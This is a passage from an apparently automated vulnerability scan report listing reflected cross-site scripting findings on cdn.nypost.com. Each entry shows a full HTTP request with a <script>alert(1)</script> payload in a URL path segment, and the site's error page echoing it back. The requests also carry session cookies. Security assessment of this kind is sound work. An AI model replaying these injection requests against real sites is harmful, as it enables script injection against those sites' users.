Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks1695f<script>alert(1)</script>1bcf5332e79/top_story/top_story_functions.js</p>
...[SNIP]...

1.59. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b150c<script>alert(1)</script>83725971b2c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/top_storyb150c<script>alert(1)</script>83725971b2c/top_story_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/top_storyb150c<script>alert(1)</script>83725971b2c/top_story_functions.js</p>
...[SNIP]...

1.60. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4575a<script>alert(1)</script>425f54006e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js4575a<script>alert(1)</script>425f54006e HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js4575a<script>alert(1)</script>425f54006e</p>
...[SNIP]...

1.61. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23fa9<script>alert(1)</script>bfa3c330910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig23fa9<script>alert(1)</script>bfa3c330910/WebPortal/nypost/scripts/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:56 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig23fa9<script>alert(1)</script>bfa3c330910/WebPortal/nypost/scripts/block_functions.js</p>
...[SNIP]...

1.62. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44168<script>alert(1)</script>d9de533e3f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal44168<script>alert(1)</script>d9de533e3f3/nypost/scripts/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal44168<script>alert(1)</script>d9de533e3f3/nypost/scripts/block_functions.js</p>
...[SNIP]...

1.63. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5846<script>alert(1)</script>7944c2159fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc5846<script>alert(1)</script>7944c2159fa/scripts/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc5846<script>alert(1)</script>7944c2159fa/scripts/block_functions.js</p>
...[SNIP]...

1.64. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6de44<script>alert(1)</script>f7a795687f0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts6de44<script>alert(1)</script>f7a795687f0/block_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts6de44<script>alert(1)</script>f7a795687f0/block_functions.js</p>
...[SNIP]...

1.65. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f14d0<script>alert(1)</script>7d32754b847 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/block_functions.jsf14d0<script>alert(1)</script>7d32754b847 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/block_functions.jsf14d0<script>alert(1)</script>7d32754b847</p>
...[SNIP]...

1.66. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43474<script>alert(1)</script>d4f45f4e093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig43474<script>alert(1)</script>d4f45f4e093/WebPortal/nypost/scripts/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:55 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig43474<script>alert(1)</script>d4f45f4e093/WebPortal/nypost/scripts/dropmenu.js</p>
...[SNIP]...

1.67. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 336ab<script>alert(1)</script>b1da3cafbfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal336ab<script>alert(1)</script>b1da3cafbfb/nypost/scripts/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal336ab<script>alert(1)</script>b1da3cafbfb/nypost/scripts/dropmenu.js</p>
...[SNIP]...

1.68. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0a77<script>alert(1)</script>b4b689b67a9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc0a77<script>alert(1)</script>b4b689b67a9/scripts/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc0a77<script>alert(1)</script>b4b689b67a9/scripts/dropmenu.js</p>
...[SNIP]...

1.69. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8cbad<script>alert(1)</script>47ea44d790f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts8cbad<script>alert(1)</script>47ea44d790f/dropmenu.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts8cbad<script>alert(1)</script>47ea44d790f/dropmenu.js</p>
...[SNIP]...

1.70. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5e96c<script>alert(1)</script>71b3a089308 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js5e96c<script>alert(1)</script>71b3a089308 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js5e96c<script>alert(1)</script>71b3a089308</p>
...[SNIP]...

1.71. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/scripts/functions.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ac23<script>alert(1)</script>b341005b818 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig4ac23<script>alert(1)</script>b341005b818/WebPortal/nypost/scripts/functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 706
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:53:49 GMT
Connection: close

